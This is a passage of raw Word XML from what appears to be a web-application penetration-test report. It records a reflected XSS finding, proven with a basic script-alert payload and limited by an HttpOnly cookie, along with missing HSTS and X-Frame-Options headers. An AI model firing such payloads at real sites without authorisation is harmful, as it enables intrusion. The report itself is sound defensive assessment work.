                <wp:extent cx="1604407" cy="162685"/>
                <wp:effectExtent l="0" t="0" r="15240" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="99" name="Rectangle 99"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1604407" cy="1626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4F0E14">
              <v:rect id="Rectangle 99" style="position:absolute;margin-left:169.2pt;margin-top:63.95pt;width:126.35pt;height:12.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0B12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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F07AEB" w:rsidRPr="00F07AEB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E70F485" wp14:editId="12A08704">
            <wp:extent cx="5842384" cy="2282025"/>
            <wp:effectExtent l="0" t="0" r="6350" b="444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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5868447" cy="2292205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D278652" w14:textId="321DE461" w:rsidR="00341547" w:rsidRPr="00341547" w:rsidRDefault="00341547">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00341547">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Testing Payload:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00341547" w14:paraId="4DC2E7A5" w14:textId="77777777" w:rsidTr="00341547">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CC0DBF4" w14:textId="3F7DF7A6" w:rsidR="00341547" w:rsidRDefault="00341547">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;script&gt;alert(‘XSS’)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A28A8FE" w14:textId="090E2822" w:rsidR="00341547" w:rsidRDefault="00341547">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="694F2F0C" w14:textId="77777777" w:rsidR="009045D1" w:rsidRDefault="009045D1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4892D8AE" w14:textId="378FF458" w:rsidR="00775377" w:rsidRDefault="00917A36" w:rsidP="00F31AD1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The XSS test payload used was successful</w:t>
      </w:r>
      <w:r w:rsidR="009C2B42">
        <w:t>ly</w:t>
      </w:r>
      <w:r w:rsidR="003F257D">
        <w:t xml:space="preserve"> submitted </w:t>
      </w:r>
      <w:r w:rsidR="003B3510">
        <w:t xml:space="preserve">and executed by the browser. </w:t>
      </w:r>
      <w:r w:rsidR="0067601F">
        <w:t xml:space="preserve">Since no output </w:t>
      </w:r>
      <w:r w:rsidR="00A844DC">
        <w:t xml:space="preserve">sanitization was </w:t>
      </w:r>
      <w:r w:rsidR="006D57E5">
        <w:t xml:space="preserve">implemented </w:t>
      </w:r>
      <w:r w:rsidR="4307B088">
        <w:t>either</w:t>
      </w:r>
      <w:r w:rsidR="006D57E5">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A844DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D57E5">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="005A6E25">
        <w:t>s seen bel</w:t>
      </w:r>
      <w:r w:rsidR="00960400">
        <w:t xml:space="preserve">ow, an alert </w:t>
      </w:r>
      <w:r w:rsidR="00CF5D2E">
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="0015437F">
        <w:t>executed on the client-side browser.</w:t>
      </w:r>
      <w:r w:rsidR="009B503F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B3510">
        <w:t>This verifies that the web application is vulnerable to XSS.</w:t>
      </w:r>
      <w:r w:rsidR="00466050" w:rsidRPr="00466050">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CDCE49" w14:textId="3B48CA72" w:rsidR="00F76444" w:rsidRDefault="00466050" w:rsidP="00526507">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658286" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D2A4A21" wp14:editId="3958BAE5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2249536</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>163099</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1452943" cy="465614"/>
                <wp:effectExtent l="0" t="0" r="13970" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="100" name="Rectangle 100"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1452943" cy="4656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FD50C4">
              <v:rect id="Rectangle 100" style="position:absolute;margin-left:177.15pt;margin-top:12.85pt;width:114.4pt;height:36.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5968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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00291CED" w:rsidRPr="00291CED">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="682F530F" wp14:editId="07FECE69">
            <wp:extent cx="5943600" cy="1702435"/>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42BB10E4" w14:textId="45342E71" w:rsidR="008D53EA" w:rsidRDefault="00917A36" w:rsidP="00526507">
      <w:r>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
      <w:r w:rsidR="008D53EA">
        <w:t xml:space="preserve">Upon using the in-built browser developer tools, the session cookie </w:t>
      </w:r>
      <w:r w:rsidR="000D1E86">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="002E783B">
        <w:t>included</w:t>
      </w:r>
      <w:r w:rsidR="000D1E86">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidR="00D52A58">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="000D1E86">
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r w:rsidR="002E783B">
        <w:t xml:space="preserve"> flag. This is used to prevent </w:t>
      </w:r>
      <w:r w:rsidR="00E15233">
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="00732D8E">
        <w:t xml:space="preserve"> from gaining access to the session cooki</w:t>
      </w:r>
      <w:r w:rsidR="00816562">
        <w:t>e.</w:t>
      </w:r>
      <w:r w:rsidR="00033AEB" w:rsidRPr="00033AEB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7FE60E" w14:textId="7DE66D47" w:rsidR="004A63E9" w:rsidRDefault="00033AEB" w:rsidP="004A63E9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658287" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="64032B0D" wp14:editId="33CB84C8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4235411</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1044</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="319760" cy="200660"/>
                <wp:effectExtent l="0" t="0" r="23495" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="101" name="Rectangle 101"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="319760" cy="200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66A65E">
              <v:rect id="Rectangle 101" style="position:absolute;margin-left:333.5pt;margin-top:.1pt;width:25.2pt;height:15.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9BA4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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004A63E9" w:rsidRPr="008D53EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74CD14D9" wp14:editId="0760C7B0">
            <wp:extent cx="5943600" cy="200660"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="18946376" name="Picture 1894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00660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA250C8" w14:textId="77777777" w:rsidR="00FB0694" w:rsidRDefault="00FB0694" w:rsidP="00526507"/>
    <w:p w14:paraId="22F7E1F2" w14:textId="1744FCC8" w:rsidR="004A63E9" w:rsidRDefault="004A63E9" w:rsidP="00526507">
      <w:r>
        <w:t>As seen in the screenshot, when using the Console function in the browser developer tools, the JavaScript method “document.cookie” returned no results. This is due to the HttpOnly flag in the session cookie. Hence, XSS cannot be used for session hijacking attacks but is still vulnerable to other exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571BD159" w14:textId="5D17A34B" w:rsidR="00E73BD6" w:rsidRPr="00E73BD6" w:rsidRDefault="00E839E8" w:rsidP="00817BD5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1382DA6F" wp14:editId="049B7238">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1267818</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1135388</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1121964" cy="381428"/>
                <wp:effectExtent l="0" t="0" r="21590" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="102" name="Rectangle 102"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1121964" cy="3814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BB4C16">
              <v:rect id="Rectangle 102" style="position:absolute;margin-left:99.85pt;margin-top:89.4pt;width:88.35pt;height:30.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649B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mvhA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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004A63E9" w:rsidRPr="00E73BD6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B216F30" wp14:editId="70DDA9CC">
            <wp:extent cx="3849520" cy="1991485"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="18946379" name="Picture 189463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79" name="Picture 18946379" descr="Graphical user interface, application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3921913" cy="2028936"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7078828E" w14:textId="23EE9977" w:rsidR="000D3F50" w:rsidRDefault="000D3F50" w:rsidP="004A63E9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc93487296"/>
      <w:bookmarkStart w:id="91" w:name="_Toc93502873"/>
      <w:bookmarkStart w:id="92" w:name="_Toc93526908"/>
    </w:p>
    <w:p w14:paraId="2025F66B" w14:textId="74C1B920" w:rsidR="00D83B07" w:rsidRDefault="00D83B07">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58ADFA62" w14:textId="77777777" w:rsidR="00F2602A" w:rsidRDefault="00F2602A" w:rsidP="00F2602A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc94100236"/>
      <w:bookmarkStart w:id="94" w:name="_Toc93487299"/>
      <w:bookmarkStart w:id="95" w:name="_Toc93502876"/>
      <w:bookmarkStart w:id="96" w:name="_Toc93526911"/>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>
      <w:r w:rsidRPr="007F2060">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">HSTS </w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2060">
        <w:t xml:space="preserve">issing from HTTPS </w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2060">
        <w:t>erver</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="089806B0" w14:textId="4310A647" w:rsidR="002450F9" w:rsidRPr="002450F9" w:rsidRDefault="002450F9" w:rsidP="002450F9">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
      <w:r w:rsidR="00BB7A25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Colin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256B5CF1" w14:textId="56ECAB5C" w:rsidR="00F2602A" w:rsidRDefault="00F2602A" w:rsidP="00F2602A">
      <w:r w:rsidRPr="00506EF8">
        <w:t>The remote HTTPS server is not enforcing HTTP Strict Transport Security (HSTS). HSTS is an optional response header that can be configured on the server to instruct the browser to only communicate via HTTPS. The lack of HSTS allows downgrade attacks, SSL-stripping</w:t>
      </w:r>
      <w:r w:rsidR="00173A0D">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00506EF8">
        <w:t xml:space="preserve"> man-in-the-middle attacks and weakens cookie-hijacking protections</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007677AE" w:rsidRPr="007677AE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D94D23" w14:textId="6EE0635D" w:rsidR="00F2602A" w:rsidRDefault="007677AE" w:rsidP="00F2602A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658289" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6510C593" wp14:editId="58E8B780">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>380999</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>124778</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1223963" cy="1123950"/>
                <wp:effectExtent l="0" t="0" r="14605" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="103" name="Rectangle 103"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1223963" cy="1123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8A453D">
              <v:rect id="Rectangle 103" style="position:absolute;margin-left:30pt;margin-top:9.85pt;width:96.4pt;height:8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383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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F2602A" w:rsidRPr="005A4AAD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58B1D2BF" wp14:editId="38EEC95F">
            <wp:extent cx="5943600" cy="3269615"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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96"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3269615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05710B6A" w14:textId="7DFC914A" w:rsidR="00F2602A" w:rsidRDefault="00F2602A" w:rsidP="00F2602A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C401D">
        <w:t>SSL stripping attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C401D">
        <w:t>also known as SSL downgrade or HTTP downgrade attacks</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C401D">
        <w:t xml:space="preserve"> are a type of attack in which </w:t>
      </w:r>
      <w:r>
        <w:t>attackers</w:t>
      </w:r>
      <w:r w:rsidRPr="006C401D">
        <w:t xml:space="preserve"> downgrade a web connection from the more secure HTTPS to the less secure HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This can result in sensitive data in transit </w:t>
      </w:r>
      <w:r w:rsidR="00D52A58">
        <w:t>being</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exposed such as username and password. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>This vulnerability was detected by Nessus during vulnerability scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCF90DC" w14:textId="77777777" w:rsidR="00F2602A" w:rsidRDefault="00F2602A" w:rsidP="00F2602A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F54055" w14:textId="77777777" w:rsidR="00F2602A" w:rsidRDefault="00F2602A" w:rsidP="00F2602A">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27524249" w14:textId="77777777" w:rsidR="00951011" w:rsidRDefault="00951011" w:rsidP="00951011">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc94100237"/>
      <w:r w:rsidRPr="00A42F9C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">X-Frame-Options Header </w:t>
      </w:r>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42F9C">
        <w:t xml:space="preserve">ot </w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00A42F9C">
        <w:t>et</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
      <w:r w:rsidRPr="00A42F9C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F3B6D" w14:textId="2CEFAC29" w:rsidR="00D727EA" w:rsidRPr="00D727EA" w:rsidRDefault="00D727EA" w:rsidP="00D727EA">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00587EAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C5C21D" w14:textId="10A5D218" w:rsidR="00951011" w:rsidRDefault="00951011" w:rsidP="00951011">
      <w:r w:rsidRPr="008B218C">
        <w:t xml:space="preserve">The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in </w:t>
      </w:r>
      <w:r>
        <w:t>certain HTML elements</w:t>
      </w:r>
      <w:r w:rsidRPr="008B218C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>When not set, attackers</w:t>
      </w:r>
      <w:r w:rsidRPr="008B218C">
        <w:t xml:space="preserve"> can use this to </w:t>
      </w:r>
      <w:r>
        <w:t>perform</w:t>
      </w:r>
      <w:r w:rsidRPr="008B218C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D52A58">
        <w:t>clickjacking</w:t>
      </w:r>
      <w:r w:rsidRPr="008B218C">
        <w:t xml:space="preserve"> attacks by </w:t>
      </w:r>
      <w:r>
        <w:t>embedding malicious</w:t>
      </w:r>
      <w:r w:rsidRPr="008B218C">
        <w:t xml:space="preserve"> content </w:t>
      </w:r>
      <w:r>
        <w:t>into the web application</w:t>
      </w:r>
      <w:r w:rsidRPr="008B218C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B492F9" w14:textId="694AD45B" w:rsidR="00951011" w:rsidRPr="00EE1707" w:rsidRDefault="00951011" w:rsidP="00951011">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security Headers is a tool to scan a website that grades the security headers available or not seen. Based on the results below, the X-Frame Options </w:t>
      </w:r>
      <w:r w:rsidR="00082A7F">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00082A7F">
        <w:t>verified to be missing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Hence, it is </w:t>
      </w:r>
      <w:r w:rsidR="002B4CF6">
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00A72F24">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Clickjacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72F24">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1728889B">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72F24">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> an attack that tricks a user into clicking a webpage element </w:t>
      </w:r>
      <w:r w:rsidR="002B4CF6">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72F24">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is invisible or disguised as another element. This can cause users to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>unknowingly</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72F24">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> download malware, visit malicious web pages, provide credentials or sensitive information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>. This vulnerability was detected by Nexpose, Nessus, and Zap during vulnerability scanning.</w:t>
      </w:r>
      <w:r w:rsidR="00370EAA" w:rsidRPr="00370EAA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74773C63" w14:textId="28114466" w:rsidR="00951011" w:rsidRDefault="00370EAA" w:rsidP="00951011">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658290" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E71DFAF" wp14:editId="5654503B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3579063</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1479016</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="437565" cy="113386"/>
                <wp:effectExtent l="0" t="0" r="19685" b="20320"/>
                <wp:wrapNone/>
                <wp:docPr id="104" name="Rectangle 104"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="437565" cy="113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961702">
              <v:rect id="Rectangle 104" style="position:absolute;margin-left:281.8pt;margin-top:116.45pt;width:34.45pt;height:8.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AE58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PFgw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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00951011" w:rsidRPr="00A35E3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
